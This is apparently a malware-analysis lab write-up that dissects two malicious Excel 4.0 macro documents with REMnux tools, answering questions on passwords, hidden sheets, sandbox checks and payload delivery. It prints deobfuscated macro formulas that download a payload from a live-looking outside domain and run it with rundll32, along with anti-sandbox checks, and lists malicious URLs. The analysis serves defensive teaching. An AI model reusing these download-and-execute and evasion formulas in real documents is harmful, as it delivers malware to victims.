XLM Macros

Always open malware in a secure environment like a VM.

We will be using the REMnux distribution which is specifically made for reverse engineering.

Q1. Sample1: What is the document decryption password?

Using msoffcrypto-crack.py we can recover the password of encrypted MS Office documents.

$ msoffcrypto-crack.py sample1-fb5ed444ddc37d748639f624397cff2a.bin
Password found: VelvetSweatshop

Q2. Sample1: This document contains six hidden sheets. What are their names? Provide the value of the one starting with S.

Let's look at the file metadata using exiftool.

$ exiftool sample1-fb5ed444ddc37d748639f624397cff2a.bin 
ExifTool Version Number         : 12.42
File Name                       : sample1-fb5ed444ddc37d748639f624397cff2a.bin
Directory                       : .
File Size                       : 97 kB
File Modification Date/Time     : 2020:07:24 02:50:18-04:00
File Access Date/Time           : 2023:07:23 05:34:02-04:00
File Inode Change Date/Time     : 2023:07:23 05:31:51-04:00
File Permissions                : -rw-rw-rw-
File Type                       : XLS
File Type Extension             : xls
MIME Type                       : application/vnd.ms-excel
Comp Obj User Type Len          : 38
Comp Obj User Type              : Microsoft Office Excel 2003 Worksheet
Author                          : 
Last Modified By                : 
Software                        : Microsoft Excel
Create Date                     : 2020:04:01 11:48:22
Modify Date                     : 2020:04:02 12:21:34
Security                        : Password protected
Code Page                       : Windows Latin 1 (Western European)
App Version                     : 12.0000
Scale Crop                      : No
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
Title Of Parts                  : Sheet1, Sheet2, Sheet3, SOCWNEScLLxkLhtJp, OHqYbvYcqmWjJJjsF, Macro2, Macro3, Macro4, Macro5
Heading Pairs                   : Worksheets, 3, Excel 4.0 Macros, 6

In the Title Of Parts field we can see that there is only one starting with a S.

oledump.py sample1 -p plugin_biff.py --pluginoptions '-x' | grep "hidden"

Q3. Sample1: What URL is the malware using to download the next stage? Only include the second-level and top-level domain. For example, xyz.com.

We can use olevba for this task.

$ olevba sample1-fb5ed444ddc37d748639f624397cff2a.bin 

--snip--;
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|RUN                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ShellExecuteA       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Shell32             |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|CALL                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |http://rilaer.com/If|URL                                          |
|          |AmGZIJjbwzvKNTxSPM/i|                                             |
|          |xcxmzcvqi.exe       |                                             |
|IOC       |http://rilaer.com/If|URL                                          |
|          |AmGZIJjbw           |                                             |
|IOC       |http://rilaer.com/If|URL                                          |
|          |AmGZIJjbwzvKNTxSPM/i|                                             |
|          |xcxmzcvqi.exRUN     |                                             |
|IOC       |KUdYCRk.exe         |Executable file name                         |
|IOC       |ixcxmzcvqi.exe      |Executable file name                         |
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+--------------------+---------------------------------------------+

Q4. Sample1: What malware family was this document attempting to drop?

Before we do anything, we need to find the MD5 hash of the file.

$ md5sum sample1-fb5ed444ddc37d748639f624397cff2a.bin 
fb5ed444ddc37d748639f624397cff2a  sample1-fb5ed444ddc37d748639f624397cff2a.bin

Let's look up the hash in Malware bazaar database.

We can also look up the hash in VirusTotal.

Q5. Sample2: This document has a very hidden sheet. What is the name of this sheet?

Let's use exiftool as before in order to find the sheets contained in the file.

$ exiftool sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin 
ExifTool Version Number         : 12.42
File Name                       : sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Directory                       : .
File Size                       : 171 kB
File Modification Date/Time     : 2020:07:24 02:56:50-04:00
File Access Date/Time           : 2023:07:23 06:16:16-04:00
File Inode Change Date/Time     : 2023:07:23 05:31:51-04:00
File Permissions                : -rw-rw-rw-
File Type                       : XLS
File Type Extension             : xls
MIME Type                       : application/vnd.ms-excel
Author                          : 
Comments                        : ZNrQUl11Jl6jcYBb4wu
Last Modified By                : 
Software                        : Microsoft Excel
Create Date                     : 2020:02:27 10:23:09
Modify Date                     : 2020:03:30 12:27:59
Security                        : None
Code Page                       : Windows Latin 1 (Western European)
Company                         : 
App Version                     : 16.0000
Scale Crop                      : No
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
Title Of Parts                  : Sheet1
Heading Pairs                   : Worksheets, 1

Unfortunately, exiftool does not give us the hidden sheets.
We have to use olevba to find the hidden sheet.

$ olevba sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Type: OLE
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: CSHykdYHvi, Macrosheet
' CELL:G51, =CHAR(69.0), E
' CELL:H92, =CHAR(117.0), u
--snip--;

Q6. Sample2: This document uses reg.exe. What registry key is it checking?

In the output of the previous command, we can find the registry key.

--snip--;
' CELL:CZ14, None, 
' CELL:EE5, None, 
' CELL:AG19, None, 
' CELL:J731, None, 
"VBAWarnings"=dword:00000002
--snip--;

Q7. Sample2: From the use of reg.exe, what value of the assessed key indicates a sandbox environment?

Using the xmldeobfuscator tool, we can decode unclear XLM macros.

$ xlmdeobfuscator -f sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

    
XLMMacroDeobfuscator(v0.2.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: /home/remnux/xlm/c38-xlm-macros/sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin

Unencrypted xls file

[Loading Cells]
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
auto_open: auto_open->'CSHykdYHvi'!$J$727
[Starting Deobfuscation]
CELL:J727      , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5)
CELL:J728      , PartialEvaluation   , =WAIT("45130.30471064814600:00:03")
CELL:J729      , FullEvaluation      , FOPEN("c:\users\public\1.reg",1)
CELL:J730      , PartialEvaluation   , =FPOS(FOPEN("c:\users\public\1.reg",1),215)
CELL:J732      , PartialEvaluation   , =FCLOSE(FOPEN("c:\users\public\1.reg",1))
CELL:J733      , PartialEvaluation   , =FILE.DELETE("c:\users\public\1.reg")
--snip--;

We can see the key specified as 1.

Q8. Sample2: This document performs several additional anti-analysis checks. What Excel 4 macro function does it use?

In the xmldeobfuscator output, we can see the check being performed using the GET.WORKSPACE function.

--snip--;
CELL:K2        , FullEvaluation      , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:K4        , FullEvaluation      , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
--snip--;

Q9. Sample2: This document checks for the name of the environment in which Excel is running. What value is it using to compare?

In the output we can see the OS mentioned in the GET.WORKSPACE command.

--snip--;
CELL:J6        , FullEvaluation      , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7)
CELL:J7        , FullEvaluation      , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
CELL:J8        , FullEvaluation      , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9)
CELL:J9        , FullEvaluation      , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
CELL:J11       , FullEvaluation      , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12)
--snip--;

Q10. Sample2: What type of payload is downloaded?

The process is opening a rundll32.exe file.

--snip--;
CELL:J9        , FullEvaluation      , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
--snip--;

Q11. Sample2: What URL does the malware download the payload from?

Again the answer can be found in the output of the xmldeobfuscator.

--snip--;
CELL:J7        , FullEvaluation      , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
--snip--;

Q12. Sample2: What is the filename that the payload is saved as?

The answer lies in the previous snippet.

Q13. Sample2: How is the payload executed? For example, mshta.exe

We can find the answer in in the same snippet as Q10 as the payload is first opened and then executed.

Q14. Sample2: What was the malware family?

Use md5sum to obtain the file hash.

$ md5sum sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin 
b5d469a07709b5ca6fee934b1e5e8e38  sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin

Let's look up this hash in VirusTotal.

The answer is the one listed by TrendMicro.

Last updated 2 years ago